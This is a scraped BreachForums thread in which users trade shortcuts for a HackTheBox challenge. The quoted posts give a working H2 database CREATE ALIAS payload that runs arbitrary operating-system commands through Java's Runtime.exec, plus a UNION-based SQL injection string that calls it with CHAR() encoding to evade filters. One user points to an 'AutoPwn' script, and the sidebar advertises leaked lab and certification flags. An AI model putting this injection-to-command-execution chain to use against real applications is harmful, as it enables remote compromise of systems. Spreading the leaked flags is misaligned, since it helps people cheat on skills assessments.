JOIN BREACHFORUMS TELEGRAM
Pentest Notes Hackthebox Challenge flag
by trevor69000 - Sunday October 27, 2024 at 07:17 AM
VIP User
VIP
Posts: 116
Threads: 6
Joined: Mar 2024
Reputation: 17
#11
Nov 15, 2024, 12:40 PM
(Nov 14, 2024, 10:59 PM)0xhdfg Wrote:
(Oct 27, 2024, 08:12 PM)mazafaka555 Wrote:
(Oct 27, 2024, 07:50 PM)Steward Wrote: you should better explain how to bypass filter for $$ and CONCAT instead of just flag

create aliases without a  `$`
CREATE ALIAS EXECVE AS 'String execve(String cmd) throws java.io.IOException { return new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\\\A").hasNext() ? new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\\\A").next() : ""; }';


How can I then use the alias? I'm trying something like: 
SQL Injection' OR 1=0 UNION SELECT EXECVE(CHAR(119) + CHAR(104) + CHAR(111) + CHAR(97) + CHAR(109) + CHAR(105)) -- -
to bypass CONCAT but I don't get it to work :/

i posted AutoPwn script here for your consumption :
http://breachqr3dqbysbq5khaadg5ynnpxn2wr...pwn-script
Reply
Breached
Member
Posts: 14
Threads: 0
Joined: Nov 2024
Reputation: 0
#12
Nov 15, 2024, 03:50 PM
Don't have credits, give me a clue :/
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot htb-bot 92 8,466 4 hours ago
Last Post: unionstorm
  Hack the box Pro Labs, VIP, VIP+ 1 month free Method RedBlock 25 2,521 11 hours ago
Last Post: cry_elite
  CBBH Write Ups hiddenhacker 25 6,581 11 hours ago
Last Post: cry_elite
  [FREE] CPTS 12 FLAGS pulsebreaker 84 2,922 11 hours ago
Last Post: justhelpmefly
  [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags Techtom 33 3,096 11 hours ago
Last Post: justhelpmefly

Forum Jump:


 Users browsing this forum: 1 Guest(s)